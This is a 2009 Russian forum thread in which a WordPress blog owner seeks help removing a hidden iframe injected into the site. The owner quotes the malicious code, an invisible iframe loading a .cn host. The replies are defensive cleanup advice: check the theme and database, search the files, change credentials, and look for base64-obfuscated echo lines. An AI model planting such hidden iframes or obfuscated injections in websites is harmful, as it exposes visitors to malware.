Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Болталка (https://forum.antichat.xyz/forumdisplay.php?f=46)
-   -   ***ный фрейм в моём блоге! (https://forum.antichat.xyz/showthread.php?t=108638)

oOoOoOo 01.03.2009 17:50

***ный фрейм в моём блоге!
 
Тяпнули фрейм ко мне в блог, не могу найти. В исходном тексте его видно:
Цитата:

<html><body><iframe src="http://bestlotron.cn/in.cgi?cocacola54" width=1 height=1 style="visibility: hidden"></iframe></body></html>
А в файлах не могу найти, в индексе нету, в индексе который в папке wp-content был, я его удалил, а он почему то не пропал. Куда их ещё могли распихать??

mad_xakep 01.03.2009 17:51

егов админке щи в стилях

oOoOoOo 01.03.2009 17:57

Цитата:

Сообщение от mad_xakep
егов админке щи в стилях

А поконкретней?

ntldr 01.03.2009 17:58

дай угадаю. 000webhost?

oOoOoOo 01.03.2009 18:01

Цитата:

Сообщение от ntldr
дай угадаю. 000webhost?

Нет, best-hoster.ru , был на другом хосте , тоже фреймы ставили один раз, походу в wp что то

PaCo 01.03.2009 18:05

Посмотри сдеся -
\wp-content\themes\текушая_тема\
а вобще можно записать во многие файлы, где именно вылазитет ифрейм, в начале или в конце страницы?

mad_xakep 01.03.2009 18:07

Редактор тем нажми там смотри
footer sidebar и т д

[Dezzter] 01.03.2009 18:08

ищи в файлах темы, 100% там, а вообще следующий раз юзай плагин http://mywordpress.ru/plugins/belavir/

oOoOoOo 01.03.2009 18:10

Фрейм в самом конце вылазит

dinar_007 01.03.2009 18:12

Хеадер.пхп в папке с темой глянь..

PaCo 01.03.2009 18:15

если в конце после контента то посмотри в footer.php и index.php в папке с темой

oOoOoOo 01.03.2009 18:20

удалил ещё один из индекса темы.....блять сколько их ещё...

PaCo 01.03.2009 18:21

Ставь сразу права на файлы - что бы апачь только чтения

dinar_007 01.03.2009 18:22

Попробуй автоматическим поиском текста в файлах найти фреймы...

mailbrush 01.03.2009 18:41

Цитата:

Попробуй автоматическим поиском текста в файлах найти фреймы...
Они могут быть заенкодены в базе64 и гз...

PaCo 01.03.2009 18:46

Ну тс же написал что они в плаен тексте, хотя может какая то часть из них может быть с обфускацией, может также быть и в js засунули, ТС поменяй все пассы на ftp, доступы в админку, также если ты помнишь дату когда заливал на сайт файлы зделай поиск по дате изменения, хотя она легко обходиться touch.

oOoOoOo 01.03.2009 18:52

А как в тотал командере сделать поиск текста в нескольких файлах и папках?

PaCo 01.03.2009 18:53

Цитата:

Сообщение от oOoOoOo
А как в тотал командере сделать поиск текста в нескольких файлах и папках?

alt+f7

mailbrush 01.03.2009 18:56

Цитата:

Ну тс же написал что они в плаен тексте
Они в плеин тексте при выводе, а в сорсах могут быть типа
PHP код:

echo base64_decode("PGZyYW1lPmxpbms8L2ZyYW1lPg=="); 


Talisman 01.03.2009 18:56

втыкай маяки в файлы:

баш скриптом в каждый файл папки втыкай нечто:

<-- file name -->

потом уберешь это. это разобьет вывод на части и будет проще найти.

но встречал и извращенцев, которые срали переменные в одном файле, которые штатно выводил другой файл :) нашел этим способом

PaCo 01.03.2009 19:04

Может когда ты удаляешь ифрейм делаеться какая ето проверка, и если ифрейма нету то он добавляеться, для фтп есть спец скрипт для этих целей, также втречал ифрейм через include удаленого файла.

..::TROYAN::.. 01.03.2009 19:11

в бд проверь,там могут быть айфреймы...


Время: 01:33